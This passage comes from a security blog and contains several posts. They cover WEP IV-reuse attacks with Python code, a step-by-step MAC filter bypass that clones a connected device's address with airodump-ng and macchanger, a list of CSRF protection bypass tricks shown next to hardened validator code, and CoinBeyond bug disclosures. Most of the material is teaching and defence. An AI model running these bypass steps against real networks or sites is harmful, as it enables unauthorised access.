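    the IV travels in clear in front of the ciphertext."""
    assert len(iv) == 3
    return iv + rc4(iv + wep_key, plaintext)


def xor_of_plaintexts(packet1, packet2):
    """Two captured packets with the same IV: c1 ^ c2 == p1 ^ p2, no key needed."""
    assert packet1[:3] == packet2[:3], "only packets that reuse an IV share a keystream"
    return xor_bytes(packet1[3:], packet2[3:])


def keystream_from_known_plaintext(packet, known_prefix):
    """A known plaintext prefix (the LLC/SNAP header AA AA 03 that starts every
    WEP data frame) gives that many keystream bytes for this IV."""
    return xor_bytes(packet[3:3 + len(known_prefix)], known_prefix)


def packets_until_iv_repeat(probability=0.5, iv_bits=24):
    """Birthday bound: packets needed before some IV repeats with the given probability."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))
```

With the default probability of 0.5 the bound comes out at a few thousand packets, which is why a busy WEP network hands over IV collisions within minutes; the post's "capture a lot of packets" is this curve, and the recovered keystream bytes are what aircrack-ng builds on.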
<b><br /></b>
<b><br /></b>
<b>We will be doing the demonstration of Cracking WEP in next post.</b><br />
<b>Stay tuned </b><br />
<b><br /></b>
<b><br /></b>
<b>Regards</b><br />
<b>Jitendra(Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
</div>
Author: Jitendra (http://www.blogger.com/profile/12006899852837970196, noreply@blogger.com), comments: 0
Post id: tag:blogger.com,1999:blog-5302093523789144315.post-1008440756418389149, published: 2016-07-03T00:47:00.001+05:30, updated: 2016-07-03T00:47:34.193+05:30
Title: Accessing an AP Which has a MAC filter enabled
<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>So in the previous post I was talking about what a MAC address is and I explained how to find your MAC address, etc.</b><br />
<b>Now there are certain Wi-Fi networks which use a MAC filter to give access to their clients. </b><br />
<b>A MAC filter consists of a whitelist of MAC addresses. So a user can connect to that network only when his MAC address exists in that whitelist.</b><br />
<b><br /></b>
<b>So suppose you know the password of a network (access point) but it has a MAC filter enabled; then you will not be able to connect to that network.</b><br />
<b><br /></b>
<b>So in this post we will bypass the MAC filter of a router to get access to that network.</b><br />
<b><br /></b>
<b>So first of all we will check the devices connected to the AP, then we will change our MAC address, and since we know the password we can connect to that network.</b><br />
<b><br /></b>
<h4 style="text-align: left;">
<b>Tools we are going to use in this </b></h4>
<div>
<ol style="text-align: left;">
<li><b> aircrack-ng suite </b></li>
<li><b>MAC changer</b></li>
</ol>
<b>Let's start </b></div>
<div>
<b><br /></b></div>
<div>
<b>1. First of all we need to enable our network card in monitor mode so we are able to capture all the packets. Our card is in managed mode by default, so we have to enable monitor mode.</b></div>
<div>
<b>My network card name is wlan0.</b></div>
<div>
<b>Open a terminal in Kali and give this command</b></div>
<div>
<b><br /></b></div>
<div>
<b><i><u>airmon-ng start wlan0</u></i></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAlgSO2wDu0iwubDVNbvUg9pgzklZx8c1LXscjn6n30uX8_QS8V4HFMvkPgHu8Yqc9t3VJVMtdLtB7GlznsjmkSh-rOleZHMFKMUsRUuz4jpYdSDqO3V-a0ZUGX9HCrSlgkeyUTYq91aA/s1600/airmon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAlgSO2wDu0iwubDVNbvUg9pgzklZx8c1LXscjn6n30uX8_QS8V4HFMvkPgHu8Yqc9t3VJVMtdLtB7GlznsjmkSh-rOleZHMFKMUsRUuz4jpYdSDqO3V-a0ZUGX9HCrSlgkeyUTYq91aA/s320/airmon.png" width="320" /></a></div>
<div>
<b><i><u><br /></u></i></b></div>
<div>
<b><i><u><br /></u></i></b></div>
<div>
<b>This starts the network card in monitor mode as a new interface, which will be mon0.</b></div>
<div>
<b><br /></b></div>
<div>
<b>2. Now we can monitor all the networks within range of our Wi-Fi card. To list them, give this command: </b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<b><i><u>airodump-ng mon0</u></i></b><br />
<b><i><u><br /></u></i></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr4_zLWBbg47YZejeuSX6TX6x7TSptsUiTSu2UzQOE-BMJk2NetTDgh4cs5idphu18yvNw503IOFVxQMBpzShB-1O1DED6GpA1RcHO-0Ksn9Yu-8wAJlZYBBUE4rLEhurHwvUy8N4B738/s1600/airodump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr4_zLWBbg47YZejeuSX6TX6x7TSptsUiTSu2UzQOE-BMJk2NetTDgh4cs5idphu18yvNw503IOFVxQMBpzShB-1O1DED6GpA1RcHO-0Ksn9Yu-8wAJlZYBBUE4rLEhurHwvUy8N4B738/s320/airodump.png" width="320" /></a></div>
<b><i><u><br /></u></i></b>
<b><i><u><br /></u></i></b>
<b>Here BSSID is the MAC address of the network, </b><br />
<b>CH = channel,</b><br />
<b>PWR = signal level, which indicates our distance from the AP,</b><br />
<b>Data = data packets transferred,</b><br />
<b>ENC = encryption used.</b><br />
<b><br /></b>
<b>3. Now, to monitor all the devices connected to that network, open a terminal and type </b><br />
<b><br /></b>
<b><i><u>airodump-ng --bssid &lt;MAC address of network&gt; --channel &lt;channel&gt; &lt;wifi_card_in_monitor_mode&gt;</u></i></b><br />
<b><i><u><br /></u></i></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl8FdF_1XnTykTIqWdPglpqBFPE0wUxjhTpgUoFXsHfBQDVzjMsV5zpt6tkKuuvUCOUBLgJmQfHWedgCiG6Wt7503JdDJXlZ4slZ9w5CHSWv4oBryBetJOk9Pf_w9lqPu0sMP148HG-jU/s1600/device_conn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl8FdF_1XnTykTIqWdPglpqBFPE0wUxjhTpgUoFXsHfBQDVzjMsV5zpt6tkKuuvUCOUBLgJmQfHWedgCiG6Wt7503JdDJXlZ4slZ9w5CHSWv4oBryBetJOk9Pf_w9lqPu0sMP148HG-jU/s320/device_conn.png" width="320" /></a></div>
<b><i><u><br /></u></i></b>
<b><i><u><br /></u></i></b>
<b>It will show the MAC addresses of all the connected devices under the STATION column. </b><br />
<b>Copy any one of them.</b><br />
<b><br /></b>
<b><br /></b>
<b>Now give these commands to change your MAC address to a whitelisted one (copied in step 3): </b><br />
<b><i><u>ifconfig wlan0 down</u></i></b><br />
<b><i><u>macchanger --mac &lt;MAC copied in step 3&gt; wlan0</u></i></b><br />
<b><i><u>ifconfig wlan0 up</u></i></b><br />
<b><i><u><br /></u></i></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjDiSTV2SLW4e3YehnAtouU_y56n3NLZc3d7qr0CdVCPY_YG6u1_tbhmU1cIfwmK8JTrtE3gA4hNoLxKAWB1l3lQNz2mxBG5u7v9DK9jEXPPlzJc0nfFgOrE9bArfXpsJ4wOa9g8c12zc/s1600/macchanger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjDiSTV2SLW4e3YehnAtouU_y56n3NLZc3d7qr0CdVCPY_YG6u1_tbhmU1cIfwmK8JTrtE3gA4hNoLxKAWB1l3lQNz2mxBG5u7v9DK9jEXPPlzJc0nfFgOrE9bArfXpsJ4wOa9g8c12zc/s320/macchanger.png" width="320" /></a></div>
<b><i><u><br /></u></i></b>
<b><i><u><br /></u></i></b>
<b>Now enter the password and you will be able to connect to the network even though the MAC filter is enabled.</b><br />
<br />
<br />
<br />
<b>Note: To restore the permanent MAC address, type <i><u>macchanger -p wlan0</u></i></b><br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hope this helped </b><br />
<b><br /></b>
<b>Feel free to comment</b><br />
<b><br /></b>
<b>Thanks</b><br />
<b>Jitendra K Singh(Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-83944323259747107782016-06-26T14:44:00.000+05:302016-06-26T14:44:16.702+05:30What is MAC: Explanation <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYim5uxOQUD2MCfou1twuXnX4kKyFCd8R-xxBmsaI3WSnjcHIaakH6sAJkrFDnpRY7zfhPpqYJQBYjwQDEi09UcNrCkNMB41aQGHHOPVFxdF4X9y9ujJI11m2CLllyB0RK1RDH08Coi4/s1600/image.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYim5uxOQUD2MCfou1twuXnX4kKyFCd8R-xxBmsaI3WSnjcHIaakH6sAJkrFDnpRY7zfhPpqYJQBYjwQDEi09UcNrCkNMB41aQGHHOPVFxdF4X9y9ujJI11m2CLllyB0RK1RDH08Coi4/s320/image.jpg" width="320" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<br />
<h2 style="text-align: left;">
<b>What is a MAC address</b></h2>
<div>
<b>MAC stands for Media Access Control.</b></div>
<div>
<b>Each network card has a physical, static address assigned by the card manufacturer, called the MAC address.</b></div>
<div>
<b>The MAC address is used between devices to identify each other and to deliver packets to the right place.</b></div>
<div>
<b>Each packet has a source MAC and a destination MAC address.</b></div>
<div>
<b><br /></b></div>
<div>
<b>This address is also known as the hardware address. It uniquely identifies the adapter on the LAN.</b></div>
<div>
<b>A MAC address is a 12-digit hexadecimal number (48 bits). It is written in the following format:</b></div>
<div>
<b><br /></b></div>
<div>
<b><i>MM:MM:MM:SS:SS:SS</i></b></div>
<div>
<b><i><br /></i></b></div>
<div>
<b>The first half of the MAC (24 bits) contains the ID number of the adapter manufacturer.</b></div>
<div>
<b>The second half (24 more bits) represents the serial number assigned to the adapter by the manufacturer.</b></div>
<div>
<br /></div>
<h3 style="text-align: left;">
<b>How to find your MAC address</b></h3>
<div style="text-align: left;">
<ul style="text-align: left;">
<li><b>On Windows: open the command prompt and enter the following command </b></li>
</ul>
<b><i><u>ipconfig /all </u></i></b></div>
<div style="text-align: left;">
Here is the image </div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://uit.stanford.edu/sites/default/files/images/2010/01/11/address.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://uit.stanford.edu/sites/default/files/images/2010/01/11/address.gif" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div>
<ul style="text-align: left;">
<li><b>On Linux: open the terminal and give the following command </b></li>
</ul>
<b><i><u>ifconfig -a </u></i></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://wiki.csn.tu-chemnitz.de/_media/en/anleitung/ubuntu-macaddr-eng.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://wiki.csn.tu-chemnitz.de/_media/en/anleitung/ubuntu-macaddr-eng.png" width="320" /></a></div>
<div>
<b><i><u><br /></u></i></b></div>
<div>
<b><br /></b></div>
<div>
<b>If you want to find out who the manufacturer of your network card is, first retrieve the MAC address of the card using one of the ways above.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Go to this <a href="http://aruljohn.com/mac.pl" rel="nofollow" target="_blank">address</a>. Now paste the first six digits of your MAC address and click on Lookup.</b></div>
<div>
<b>It will show you the manufacturer.</b></div>
<div>
<b>Let's take an example.</b></div>
<div>
<b>In the above image of Ubuntu the MAC address is 08:00:27:62:bf:e1.</b></div>
<div>
<b>Now paste the first six digits of this address into the given box, like this: 080027.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Now it will show you the vendor of the card.</b></div>
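<div>
As an added example (not the blog's code, and not the lookup site's), the Python below does the same split that the lookup above does by hand: it accepts a MAC in any of the formats shown by ipconfig /all (dashes) or ifconfig (colons), separates the first six hex digits (the manufacturer's OUI, 080027 in the Ubuntu example) from the adapter's serial part, and also reads the two flag bits of the first octet. The locally-administered bit is the one an operating system or VM sets when it assigns an address in software, so a station list can be screened for it; an address copied verbatim from another device (as in the MAC filter post above) keeps that device's original bit, so the check is a hint, not proof. The one-entry vendor table is a constructed sample; a real lookup uses the IEEE registry or the site linked above.</div>

```python
import re

# Constructed one-entry sample standing in for the IEEE OUI registry.
# 08:00:27 is the IEEE assignment used by VirtualBox virtual NICs.
SAMPLE_OUI_TABLE = {
    "080027": "PCS Systemtechnik GmbH (VirtualBox virtual NICs)",
}

_TWELVE_HEX = re.compile(r"^[0-9A-Fa-f]{12}$")


def normalize_mac(mac: str) -> str:
    """Accept 08:00:27:62:bf:e1, 08-00-27-62-BF-E1 (Windows ipconfig /all) or
    080027.62bfe1 and return the 12 uppercase hex digits (48 bits).
    Raises ValueError for anything that is not a 48-bit address."""
    digits = re.sub(r"[:\-.]", "", mac.strip())
    if not _TWELVE_HEX.match(digits):
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return digits.upper()


def parse_mac(mac: str) -> dict:
    """Split a MAC into its 24-bit OUI, 24-bit serial and the two flag bits."""
    digits = normalize_mac(mac)
    first_octet = int(digits[0:2], 16)
    oui = digits[0:6]
    return {
        # canonical colon-separated lowercase form, as ifconfig prints it
        "canonical": ":".join(digits[i:i + 2] for i in range(0, 12, 2)).lower(),
        "oui": oui,                       # first 24 bits: manufacturer ID
        "serial": digits[6:12],           # last 24 bits: per-adapter serial
        "vendor": SAMPLE_OUI_TABLE.get(oui, "unknown (not in sample table)"),
        # bit 1 of the first octet: 1 = locally administered (set in software),
        # 0 = universally administered (burned in by the manufacturer)
        "locally_administered": bool(first_octet & 0x02),
        # bit 0 of the first octet: 1 = multicast/broadcast, never a station
        "multicast": bool(first_octet & 0x01),
    }


if __name__ == "__main__":
    for sample in ("08:00:27:62:bf:e1", "08-00-27-62-BF-E1", "02:00:27:62:bf:e1"):
        print(sample, "->", parse_mac(sample))
```

<div>
The 0x02 and 0x01 masks are the IEEE 802 U/L and I/G bits of the first octet; they are read before the OUI lookup because a locally-administered address is not in the registry at all, whatever its first six digits say.</div>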
<div>
<b><br /></b></div>
<div>
<b>Hope you enjoyed it; more is coming soon.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks</b></div>
<div>
<b>Jitendra K Singh (Team Computer Korner)</b></div>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-91477742462297049202016-05-16T00:38:00.002+05:302016-05-16T00:38:18.747+05:30Bypassing the weak CSRF Protection<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Hi there,</b><br />
<b><br /></b>
<b>Everybody in the InfoSec community knows about the CSRF vulnerability.</b><br />
<b>And if a website is not using CSRF protection, they are lucky to find a full account takeover using CSRF.</b><br />
<b><br /></b>
<b>However, many security researchers only look at whether a CSRF token is present on a particular request. If it is not, they assume that the request is vulnerable to CSRF.</b><br />
<b><br /></b>
<h3 style="text-align: left;">
<b>Protections which modern WebApps use against CSRF</b></h3>
<div>
<b>There are many protections which modern WebApps use against CSRF.</b></div>
<div>
<b><br /></b></div>
<div>
<b>1. Send an authenticity token with each request: this is the basic protection which most WebApps use. They send an authenticity token with each request to protect their users against CSRF.</b></div>
<div>
<b><br /></b></div>
<div>
<b>2. X-CSRF-Token header: many WebApps use this extra layer of protection by adding an X-CSRF-Token header to each request; the token in the header is verified on every request sent to the server.</b></div>
<div>
<b>3. Referer header protection: you can only find this type of CSRF protection in some WebApps, like Twitter. They verify the Referer header, and if it points to any domain other than the website's own domain, the request is dropped and an error is shown.</b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<h3 style="text-align: left;">
<b>Some methods to bypass CSRF protection</b></h3>
<div>
<b>There are some methods which you can use to bypass CSRF protection.</b></div>
<div>
<b><br /></b></div>
<div>
<b>1. Many WebApps only verify the length of the CSRF token. So create an account on that website and note down the length of the CSRF token; now send any arbitrary token of the same length and it will be accepted.</b></div>
<div>
<b><br /></b></div>
<div>
<b>2. You can also use the GET method instead of POST to bypass CSRF protection.</b></div>
<div>
<b><br /></b></div>
<div>
<b>3. Many websites miss a best practice: after logging in they generate a CSRF token for us, and this token remains the same on every request until we log out. But if we note down that token and try a CSRF attack on another person's account, it will be successful.</b></div>
<div>
<b>In my opinion CSRF tokens should be unique per user, and they should expire when the user logs out.</b></div>
<div>
<b><br /></b></div>
<div>
<b>4. There is also a flaw which makes many WebApps vulnerable: they generate the CSRF token, save it in a cookie, and on each request verify the token in the POST request against the token in the cookie.</b></div>
<div>
<b>This type of protection is easy to bypass: just change both tokens, the one inside the cookie and the one sent to the server with every request, and the request will be successful.</b></div>
<div>
<b>So as a mitigation, do not just match the token against the token in the cookie.</b></div>
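<div>
As an added example, not from the post, the Python below puts the two weak checks described above (length-only comparison, and comparing the form token with a cookie the client controls) next to a hardened validator: the token is a random nonce plus an HMAC over the session id, so it is useless for any other session (flaw 3) and cannot be forged from a cookie value (flaw 4) or guessed by length (flaw 1); the Referer origin check from protection 3 is included, and state changes are refused over GET (bypass 2). SERVER_SECRET, SITE_ORIGIN and the function names are assumptions of this example.</div>

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions of this example: a server-side secret that never reaches the
# browser, and the site's own origin (both constructed placeholders).
SERVER_SECRET = b"constructed-server-secret-change-me"
SITE_ORIGIN = "https://example.test"


# ---- Weak checks the post describes as bypassable ---------------------------

def weak_length_only_check(expected: str, submitted: str) -> bool:
    """Flaw 1: only the token's length is compared, so any string of the
    right length passes."""
    return len(submitted) == len(expected)


def weak_double_submit_check(cookie_token: str, form_token: str) -> bool:
    """Flaw 4: the form token is compared with a cookie value; whoever can set
    both the cookie and the form field passes."""
    return cookie_token == form_token


# ---- Hardened alternative: token bound to the session and signed -----------

def issue_csrf_token(session_id: str) -> str:
    """Mint a per-session token: random nonce + HMAC(secret, session_id:nonce).
    Nothing secret is stored client-side; the cookie holds only the session id."""
    nonce = secrets.token_hex(16)
    tag = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{tag}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Valid only for the session it was minted for: a token copied from
    another account or an arbitrary same-length string both fail."""
    nonce, sep, tag = token.partition(".")
    if not sep or len(nonce) != 32:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected)   # constant-time comparison


def referer_allowed(referer) -> bool:
    """Protection 3 from the post: the Referer's scheme and host must equal
    the site's own origin; a missing Referer is treated as foreign."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def check_state_changing_request(method: str, session_id: str, form_token: str, referer) -> bool:
    """Gate for any request that changes state: never over GET (bypass 2),
    and over POST only with a valid session-bound token and an own-origin Referer."""
    if method != "POST":
        return False
    return verify_csrf_token(session_id, form_token) and referer_allowed(referer)
```

<div>
The session id used in the HMAC is the server's own session identifier, not a value the browser can choose, which is what makes the token unique per user and dead as soon as that session is destroyed at logout.</div>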
<div>
<b><br /></b></div>
<div>
<b>Suggestions are welcome.</b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks </b></div>
<h3 style="text-align: left;">
<b>Jitendra K Singh(Team Computer Korner)</b></h3>
<b><br /></b>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-79985272818525755702016-05-11T09:00:00.000+05:302017-01-30T20:25:36.644+05:30CoinBeyond Bug: Account Lockout Never occurs<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTlVPm8EEm2p_v1jRXAc0B9zts0DDMQVFra5X9tplirN3kGaDf6" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTlVPm8EEm2p_v1jRXAc0B9zts0DDMQVFra5X9tplirN3kGaDf6" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi,</b><br />
<b><br /></b>
<b>I have not been working for the last few weeks, but I have some old bugs to share which I found about 8 months ago. I worked ethically by reporting them to the team, but they did not care to reply; I also contacted them on Twitter and they ignored my tweet.</b><br />
<b>Since it has been more than 8 months since I reported these bugs to them, I am starting to disclose them.</b><br />
<b><br /></b>
<b>This bug is about their account lockout functionality.</b><br />
<b>After signing into your account from their Android app, there is an option to set a 4-digit PIN.</b><br />
<b>You have to enter this PIN every time you reopen the app after closing it. It is a very good feature, as it can prevent intruders from accessing your account even if they have physical access to your device.</b><br />
<b>There are many features in the mobile app which the WebApp lacks.</b><br />
<b>So suppose someone knows your credentials; since there is a PIN on your device, he cannot log out from the app, because in order to log out he would have to know the right PIN to reach the logout feature.</b><br />
<b>Now, how does this functionality work?</b><br />
<b>You can't log out from the app without entering the PIN, because logging out and logging in again would disable the PIN safety measure. </b><br />
<b>If you enter the wrong PIN more than 5 times, it shows that your account is locked for 30 minutes.</b><br />
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>Now exploiting it.</b></h3>
<div>
<b>As I explained, in order to disable the PIN you have to log out. So enter the wrong PIN 5 times: it automatically logs you out of the app and shows a message like this </b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://hackerone-attachments.s3.amazonaws.com/production/000/050/727/996a45439353506da8a5949f75162dafeddd2e98/Screenshot_2015-08-22-21-41-20.png?AWSAccessKeyId=AKIAJFXIS7KJADBA4QQA&Expires=1462744140&Signature=D2IGYKHMebnVjpBAF0QLM9XJD18%3D" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://hackerone-attachments.s3.amazonaws.com/production/000/050/727/996a45439353506da8a5949f75162dafeddd2e98/Screenshot_2015-08-22-21-41-20.png?AWSAccessKeyId=AKIAJFXIS7KJADBA4QQA&Expires=1462744140&Signature=D2IGYKHMebnVjpBAF0QLM9XJD18%3D" width="180" /></a></b></div>
<b>
</b></div>
<b><br /></b>
<b>It says that the account is locked out for 30 minutes and automatically logs you out of the app. But the account lockout never actually occurs. </b><br />
<b>Since you know the credentials, you can use them to log in again, bypassing the PIN security measure, because the account lockout never happened.</b><br />
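<div>
The bug above is a lockout that exists only as a message in the app, with nothing on the server enforcing it. As an added example (not CoinBeyond's code; PinService, its methods and the constants are assumptions), the Python below shows the server-side shape that closes the gap: failed attempts and the lock expiry are stored per account, a correct PIN is refused while the lock is active, and logging out of the app and back in touches none of that state, so it cannot reset the lock.</div>

```python
import hmac
from dataclasses import dataclass

MAX_ATTEMPTS = 5           # as in the post: the 5th wrong PIN triggers the lock
LOCKOUT_SECONDS = 30 * 60  # as in the post: locked for 30 minutes


@dataclass
class AccountPinState:
    pin: str                     # demo only; store a salted hash in a real system
    failed_attempts: int = 0
    locked_until: float = 0.0    # epoch seconds; 0.0 means not locked


class PinService:
    """Server-side PIN check. The lockout is keyed by account, not by the
    app's session, so a logout/re-login from the app cannot clear it."""

    def __init__(self):
        self._accounts = {}

    def set_pin(self, account: str, pin: str) -> None:
        self._accounts[account] = AccountPinState(pin=pin)

    def is_locked(self, account: str, now: float) -> bool:
        return now < self._accounts[account].locked_until

    def verify(self, account: str, pin: str, now: float) -> str:
        """Return 'ok', 'wrong' or 'locked'. `now` is injected so the
        30-minute window can be tested without sleeping."""
        state = self._accounts[account]
        if now < state.locked_until:
            return "locked"              # refuse even a correct PIN while locked
        if hmac.compare_digest(state.pin, pin):
            state.failed_attempts = 0    # success resets the counter
            return "ok"
        state.failed_attempts += 1
        if state.failed_attempts >= MAX_ATTEMPTS:
            state.locked_until = now + LOCKOUT_SECONDS
            state.failed_attempts = 0
            return "locked"
        return "wrong"


if __name__ == "__main__":
    svc = PinService()
    svc.set_pin("demo-account", "1234")
    t = 1_000_000.0
    for _ in range(5):
        print(svc.verify("demo-account", "0000", t))
    print("correct PIN during lock:", svc.verify("demo-account", "1234", t + 60))
    print("correct PIN after lock:", svc.verify("demo-account", "1234", t + LOCKOUT_SECONDS))
```

<div>
The point of the design is where the state lives: if the counter and expiry were kept in the app (or in a session that logout destroys), the relogin in the post would start from a clean slate, which is exactly the observed behaviour.</div>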
<b><br /></b>
<b><br /></b>
<b>If you want to give your opinion on this bug feel free to comment.</b><br />
<b><br /></b>
<b>Thanks </b><br />
<b>Jitendra Santram Singh(Team Computer Korner) </b><br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-83177715844721275312016-04-26T20:00:00.000+05:302017-01-22T23:17:52.313+05:30The Story of the CoinBeyond Bug<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTlVPm8EEm2p_v1jRXAc0B9zts0DDMQVFra5X9tplirN3kGaDf6" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTlVPm8EEm2p_v1jRXAc0B9zts0DDMQVFra5X9tplirN3kGaDf6" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>So this is the story about a bug on CoinBeyond.com.</b><br />
CoinBeyond provides a future-ready payment platform for Point-of-Sale and eCommerce. They make cutting-edge payment technology adoption simple for busy merchants so they can accept more ways to pay and provide their customers a modern multi-channel checkout experience.<br />
<br />
<h3 style="text-align: left;">
The Bug</h3>
<div>
I was testing their Android app. First of all I tried to log in to my account; I was checking for any rate limiting on the user login panel of the Android app.</div>
<div>
Their login panel looks like this, and I entered my email in it </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhPmCi-6I7UA_gjqWAJ1onF-KhovCOmgkwAOgM06dlutK7Er_D1_ZwcD8r1uVcIJGYlzvzuSDmne-vwseDSpa68PSYdsMtlhxZ14cNcbph1OV3J5woYAygHelgHu_8ZapRCLiybderNu0/s1600/screen1+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhPmCi-6I7UA_gjqWAJ1onF-KhovCOmgkwAOgM06dlutK7Er_D1_ZwcD8r1uVcIJGYlzvzuSDmne-vwseDSpa68PSYdsMtlhxZ14cNcbph1OV3J5woYAygHelgHu_8ZapRCLiybderNu0/s320/screen1+%25281%2529.png" width="180" /></a></div>
<div>
<br /></div>
<b><br /></b>
<b>I entered a wrong password for login and it took me to another page </b><br />
<b>which looks like this </b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://hackerone-attachments.s3.amazonaws.com/production/000/050/657/172dd5b2560282e55451b90fc0f5f3716d1cd7ac/screen2.png?AWSAccessKeyId=AKIAJFXIS7KJADBA4QQA&Expires=1461525920&Signature=VEP6ArCve%2BmewgKRui41XIhuqs0%3D" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://hackerone-attachments.s3.amazonaws.com/production/000/050/657/172dd5b2560282e55451b90fc0f5f3716d1cd7ac/screen2.png?AWSAccessKeyId=AKIAJFXIS7KJADBA4QQA&Expires=1461525920&Signature=VEP6ArCve%2BmewgKRui41XIhuqs0%3D" width="180" /></a></b></div>
<br />
<b><br /></b>
<b><br /></b>
<b>But there is something weird here.</b><br />
<b>I entered my email, which is jkspentester@**.in, but on this page it only shows<i> jkspentester</i></b><br />
<b><i>Jkspentester</i> was my username for that account, so basically it is leaking the username associated with the email address entered in the above steps.</b><br />
<b><br /></b>
<br />
<h4 style="text-align: left;">
<b>Steps To Reproduce</b></h4>
<div>
<ol style="text-align: left;">
<li><b>Open the CoinBeyond Android app and enter your email</b></li>
<li><b>Now enter any wrong password and click on Sign in.</b></li>
<li><b>On the next page the username associated with the email id will be revealed.</b></li>
</ol>
